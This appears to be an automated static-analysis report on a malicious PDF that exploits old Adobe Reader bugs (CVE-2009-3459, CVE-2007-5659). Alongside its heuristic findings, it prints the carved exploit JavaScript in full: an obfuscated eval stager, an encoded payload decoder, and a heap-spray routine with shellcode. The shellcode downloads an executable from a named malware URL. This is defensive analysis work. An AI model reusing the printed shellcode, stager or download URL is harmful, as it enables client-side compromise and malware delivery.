Malicious PDF — malware analysis report

Static analysis result for SHA-256 09f671fe3281fdb4…

MALICIOUS

PDF

41.3 KB
MD5: 43f9d3da9b541a8da3e5005245a25d94 SHA-1: 3bca0ac6979c86a8cb5e7e97ab4ab4dd715901e8 SHA-256: 09f671fe3281fdb4626f297dc7985ae17967a80d1c0759ee67a0b8cdaa867dc0
510 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains multiple critical heuristic firings indicating exploitation of Adobe Reader vulnerabilities, specifically CVE-2009-3459 and CVE-2007-5659, through embedded JavaScript. The JavaScript is designed to download a second-stage executable from the URL http://udefapcumlc.com/nte/PROX.exe/yH9702b368V0100f060006R87006a76102Tdb01d832203l000c. The presence of U3D content and specific CVE-related JavaScript gates further supports this attack pattern.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 critical CVE likely CVE_2009_3459_U3D_AUTOACTIVATE
    PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-3459 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Adobe Reader U3D CLODProgressiveMeshDeclaration exploit critical CVE likely CVE_2009_3953
    PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
  • U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator high CVE related PDF_U3D_CVE_RELATED
    PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB09-15 patch-range version gate (CVE-2009-3459) high CVE likely PDF_JS_ADOBE_APSB09_15_PATCH_GATE
    PDF JavaScript gates the exploit payload on an Adobe Reader version range that exactly matches the APSB09-15 patch boundary (< 9.2, < 8.1.7, < 7.1.4). That boundary fingerprints the CVE-2009-2990 / CVE-2009-3459 U3D parser vulnerabilities — no benign script tests all three Reader version-points together.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Dropper.Agent-7142682-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Dropper.Agent-7142682-0
  • Annotation subject percent-decoding eval stager critical PDF_ANNOT_SUBJECT_MARKER_EVAL_STAGER
    OpenAction JavaScript forces annotation enumeration, reads an annotation /Subject payload with getAnnots(), rewrites marker bytes into percent escapes, decodes it with unescape(), and dispatches it through eval. This is a high-confidence exploit-kit staging pattern. It is intentionally not mapped to CVE-2009-1492 unless getAnnots() itself carries the crafted integer or long argument shape for that vulnerability.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://udefapcumlc.com/nte/PROX.exe/yH9702b368V0100f060006R87006a76102Tdb01d832203l000c Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
bedd676af9bf2e3ca07f9e3a10d07bc561e9745801f30653ef176c0c1e7620a3		 pdf-javascript-stream PDF /JS object 7 at offset 0x1A4 336 bytes
Preview script
First 1,000 lines of the extracted script
if (1) {var z; var y; em = ''; r = (r = 'l' + 'a' + em + 'ce', 'rep' + r); th = event.target; z = y = th; 
	 y = 0; 	 z['syncAn'+'notS'+'can'] ( ); y = z;var p = y['g'+'et'+'Annots']( {  nPage: 0 }) ;var s = p[0].subject;var l = s[r](/k /g, 'q%p'[r](/[qp]/g, ''));s = th['unes' + 'cape'] (l) ;var e = th[em + 'e'+ em + 'v'+'al']; e(s);}
legacy_pdfkit_stage_000.js
eb902ec71d84e9f32f99e18aaf62a423111d76f5246470a2a882c8a69a57a9d7		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F3 13400 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function y_x_1__ylMu(Tn0j___XP76gks, E74k__lJ_g_bU_V){  var O2__0_lyg458_f = 'um' + 'en' + "ts";O2__0_lyg458_f = 'a' + 'rg' + O2__0_lyg458_f;var wd4Wb__s1E_ebv = y_x_1__ylMu[O2__0_lyg458_f]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];wd4Wb__s1E_ebv = wd4Wb__s1E_ebv["t"+"oS"+"t"+"r"+"ing"]();var bVVow8y__iO5__r = 0;try {if (app) {bVVow8y__iO5__r++;bVVow8y__iO5__r++;}} catch(e) { }var QUe5y__e1S = new Array();if (Tn0j___XP76gks) { QUe5y__e1S = Tn0j___XP76gks;} else {var q6eMtD7i2jOv_G = 0;var YjTvNVluFMp_y = 0;var ey02YR__bSUQ = 512;var UiI4_2__BkaX2AT = 52;UiI4_2__BkaX2AT = UiI4_2__BkaX2AT - 4;var O3M4n_L1c = UiI4_2__BkaX2AT + 9;while(YjTvNVluFMp_y < wd4Wb__s1E_ebv.length) {var t_d71_yAy54m2_1 = 1;var e5_84g5s = wd4Wb__s1E_ebv['c'+'h'+'arC'+'odeAt'](YjTvNVluFMp_y);if (e5_84g5s <= O3M4n_L1c && e5_84g5s >= UiI4_2__BkaX2AT) {if (q6eMtD7i2jOv_G == 4) { q6eMtD7i2jOv_G = 0; }if (isNaN(QUe5y__e1S[q6eMtD7i2jOv_G])) {QUe5y__e1S[q6eMtD7i2jOv_G] = 0;}QUe5y__e1S[q6eMtD7i2jOv_G] += e5_84g5s;if (QUe5y__e1S[q6eMtD7i2jOv_G] > 512) {QUe5y__e1S[q6eMtD7i2jOv_G] -= ey02YR__bSUQ;}q6eMtD7i2jOv_G++;}YjTvNVluFMp_y++;}}q6eMtD7i2jOv_G = 4;for (var rnbI3k = 0; rnbI3k < 4; rnbI3k++) {if (QUe5y__e1S[rnbI3k] > 256) {QUe5y__e1S[rnbI3k] -= 256;}}var sB_QA2Jv3__e = 0;var CY585psdkI6 = "";var NVvw4_BINk = 0;var b_AU4G = 0;var o1NQ0vn_Buq;var J4BUAQ_S___2 = 0;while(NVvw4_BINk < E74k__lJ_g_bU_V.length) {var iq_eH2f08l__j = E74k__lJ_g_bU_V.substr(NVvw4_BINk, 1) + "Z";var mR3__m__0__hCR = parseInt(iq_eH2f08l__j, 16);if (b_AU4G) {o1NQ0vn_Buq += mR3__m__0__hCR;if (sB_QA2Jv3__e == 4) {sB_QA2Jv3__e -= 4;}var Th52355tT_m = o1NQ0vn_Buq;Th52355tT_m = Th52355tT_m - (1 + J4BUAQ_S___2 + 1) * QUe5y__e1S[sB_QA2Jv3__e];if (Th52355tT_m < 0) {          var F_nQgkO = 256;Th52355tT_m = Th52355tT_m - Math['floor'](Th52355tT_m / F_nQgkO) * 256;}Th52355tT_m = String['from' + 'CharCode'](Th52355tT_m);if (bVVow8y__iO5__r == 2) {CY585psdkI6 += Th52355tT_m;} else if (bVVow8y__iO5__r == 1) {CY585psdkI6 += mR3__m__0__hCR;} else {CY585psdkI6 += NVvw4_BINk;}sB_QA2Jv3__e++;b_AU4G = 0;J4BUAQ_S___2++;} else {b_AU4G = 1;o1NQ0vn_Buq = mR3__m__0__hCR * 16;}NVvw4_BINk++;};var abcd=0; ;var Qi7_2AQu = this;Qi7_2AQu['ev'+'al'](CY585psdkI6);}
	y_x_1__ylMu(0, "02B90236EEC07FEDEDE015650AFD74ED413747164118CED393383158A699F98675938637D698E381C8DA8F1E04D8FD5EDC13C617361858A73B61CF0543824D8E2C95B0B846B38683AAFB24EFC326604EDB4523E0BA30BF21FB4C38DFDCA4B624FC8842C429A8CCEE42CA66B74B17F128A237A195B6215B24BD8A9099CB893600F078CD36EAAA56FFF3F7E1704A1791DD5E064465576CD2D78A7F180F6FAEE1D06CCC6F08C5D7FFADD5CC64E6D1D8E260E73EBF28EC6E41A0FC81A6D666975F67739005DF44B5403E77B819BC842A9F5DB53F08EBCD189C0E0F6F419C169CAE4A31C677CA4CB3C03732C8A2A5730127F6A1217B616D185B24BD8A9070D3A05F0B0578CD3614D9920121E11E7AFC2B97CF223A3424776DC2E1908A184F6A68F2BDABA1770ED9C1CC6EADC15901FD1EE066CD41C304254608783B80CF136D61293E87A2EFFE83E5992E79B8FAE5BC17AD779A4C3FC9F86AC95C0340219CDD73E944EC805AB54CD70D472A0495B47B2C28DE691570676D185BCEA677D885E1B120DBAC7AC038C4A340D81B000F734DF360FB5144435B2461C68E44624F4E93A5F98CB8BD7E3DD8E0C06FB9B862EFB433E0880B40AF233D181D4EFE48A0C82F587D926B8AF1F583D7794270B8EDA69E17A85DD951F0A1A46CBF20FD774FC50D6CB41949D587BE4DE405F670F762A773171F17600C7EA2A9664722C438AC46AC612019ACCCEF4805D77FED15CCE42611D862AE0EF8FB16785792CF7B774F3F686CBB7EC9CE714884F0FFADDBDE7514D60302750B0CC318E435009A125EA0D626A6454E3ACCFFE998EA897CA3C0E1BC7DF3A9648C0048D5E357A633EA5A3BA8EB97B4512E867CBB52DF14361CD56D6645E1E0394C50AF95A33E25FC9E63B25DD36C7300AC95B038D49A40B9DC100F6533FE85CC2E23122D632CD3D057386D4BA0ABE57EB5BE30FEDCD7FFADC2DD7E08DFFAF79DE04BB2E4305D4E95508090C7315832472CD3B00E83D77F5481E6F2D196EF9F32DF3AF0B3A41A901EBE5310E32897B23F2BB76FAF18ACC00B1CBA636834E3E0368B37AF7C894622F99E4FCF5AE79A20C9AC7AE038C4A340021BCA1165331799B22013425B786DD2DC3C8C4F189597DFBDA58C4411E1DE15BCDF0C993502D8149DDD2482150C57169E4986A2121CA468757EB7E4C790A4404F7FCE26DDB30FAF5DC40DF9F1FA59D20EE47B48C51E85B74F2BB785BD31ECC00B1C0695BD34F932308D51785866211B24BD8A909DAAA55FE0CEBEEF48F0D762C5EFB8ED26402097F04B2C01623F6EC1E03C672753A697E9BD7D9D6F29DCB3
... (truncated)
legacy_pdfkit_stage_001.js
0c21043e91b23ccf522e87be33f818c9a4d81236abcc2e8cf7e309ce168228cc		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x2F3 5579 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var JH__1He_6E4oU_w = new Array();var C3LB_Xp = 0;var xy_I__OJMp = "";function PomSj68_3_4Hy(l6F002nE0, F26q7_1jv_Q_r){var sWQ6bd = F26q7_1jv_Q_r.toString();var t_2a___Y44 = "";for(var i60r__Ig8uI = 0; i60r__Ig8uI < sWQ6bd.length; i60r__Ig8uI++) {var J_h_my = parseInt(sWQ6bd.substr(i60r__Ig8uI, 1));if (!isNaN(J_h_my)) {J_h_my = J_h_my.toString(16);if (J_h_my.length == 1) { J_h_my = "0" + J_h_my; }else if (J_h_my.length != 2) { J_h_my = "00"; }t_2a___Y44 = J_h_my + t_2a___Y44;}}while(t_2a___Y44.length < 8) { t_2a___Y44 = "0" + t_2a___Y44; }var x___FENBKB7_4sb = l6F002nE0.toString(16);if (x___FENBKB7_4sb.length == 1) { x___FENBKB7_4sb = "0" + x___FENBKB7_4sb; }else if (x___FENBKB7_4sb.length != 2) { x___FENBKB7_4sb = "00"; }t_2a___Y44 = "3" + x___FENBKB7_4sb + "P" + t_2a___Y44;return t_2a___Y44;}function T_1L2_H_6pmn2l(lhWr_T1l, AC6vW_Wo_X5){var HcX_jM7q__ugMt = new Array("");var w6m_BBf_2L_B73 = lhWr_T1l;var O7mr_i_1E_Sx;if ((O7mr_i_1E_Sx = lhWr_T1l.lastIndexOf("%u00")) != -1) {if (O7mr_i_1E_Sx + 6 == lhWr_T1l.length) {HcX_jM7q__ugMt[0] = lhWr_T1l.substr(O7mr_i_1E_Sx + 4, 2);w6m_BBf_2L_B73 = lhWr_T1l.substring(0, O7mr_i_1E_Sx);}}O7mr_i_1E_Sx = 1;for (i60r__Ig8uI = 0; i60r__Ig8uI < AC6vW_Wo_X5.length; i60r__Ig8uI++) {var y_QD_633Rg = AC6vW_Wo_X5.charCodeAt(i60r__Ig8uI).toString(16);if (y_QD_633Rg.length == 1) { y_QD_633Rg = "0" + y_QD_633Rg; }HcX_jM7q__ugMt[O7mr_i_1E_Sx] = y_QD_633Rg;O7mr_i_1E_Sx++;}i60r__Ig8uI = HcX_jM7q__ugMt[0].length ? 0 : 1;HcX_jM7q__ugMt[O7mr_i_1E_Sx] = "00";HcX_jM7q__ugMt[O7mr_i_1E_Sx + 1] = "00";O7mr_i_1E_Sx += 2;if ((HcX_jM7q__ugMt.length - i60r__Ig8uI) % 2) {HcX_jM7q__ugMt[O7mr_i_1E_Sx] = "00";}while(i60r__Ig8uI < HcX_jM7q__ugMt.length) {w6m_BBf_2L_B73 += "%u" + HcX_jM7q__ugMt[i60r__Ig8uI + 1] + HcX_jM7q__ugMt[i60r__Ig8uI];i60r__Ig8uI += 2;}w6m_BBf_2L_B73 += "%u0000";return w6m_BBf_2L_B73;}function i8rnL_1_C2oW(X_ti_uk, P8fP7nT__t1){while (X_ti_uk.length*2<P8fP7nT__t1) {X_ti_uk += X_ti_uk;}X_ti_uk = X_ti_uk.substring(0,P8fP7nT__t1/2);return X_ti_uk;}function kdhgy8s_UJFn(VHbEM7_3, t_8_s80X3A, Xr__lV83__qGn_l){var fA28Hn_m = 0x0c0c0c0c;var X_ti_uk = unescape(t_8_s80X3A);var AC6vW_Wo_X5 = PomSj68_3_4Hy(VHbEM7_3, Xr__lV83__qGn_l);var fs_h__Ch8 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var lhWr_T1l = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u15e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u00a9%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0093%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8310%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9d75%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%ue6e8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4470%u4a4c%u006e%u7468%u7074%u2f3a%u752f%u6564%u6166%u6370%u6d75%u636c%u632e%u6d6f%u6e2f%u6574%u502f%u4f52%u2e58%u7865%u2f65%u4879%u3739%u3230%u3362%u3836%u3056%u3031%u6630%u3630%u3030%u3630%u3852%u3037%u3630%u3761%u3136%u3230%u6454%u3062%u6431%u3338%u3232%u3330%u306c%u3030%u0063";app.P_4_s_4 = unescape(T_1L2_H_6pmn2l(lhWr_T1l, AC6vW_Wo_X5));var W11rj22ryWmeVIW = 0x400000;var pH0_o6_S_2nu = fs_h__Ch8.length * 2;var P8fP7nT__t1 = W11rj22ryWmeVIW - (pH0_o6_S_2nu+0x38);X_ti_uk = i8rnL_1_C2oW(X_ti_uk, P8fP7nT__t1);var N6__5M68__cO = (fA28Hn_m - 0x400000)/W11rj22ryWmeVIW;for (var F05DaoC_lg = 0; F05DaoC_lg < N6__5M68__cO; F05DaoC_lg++) {JH__1He_6E4oU_w[F05DaoC_lg] = X_ti_uk + fs_h__Ch8;
... (truncated)
u3d_00_off000038ca.bin
db166b7bf539ceb527a321927dc7262838bbe91b146a4aa26884d46ee5696f20		 pdf-3d-stream PDF U3D 3D stream at offset 0x38CA 27443 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.99, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.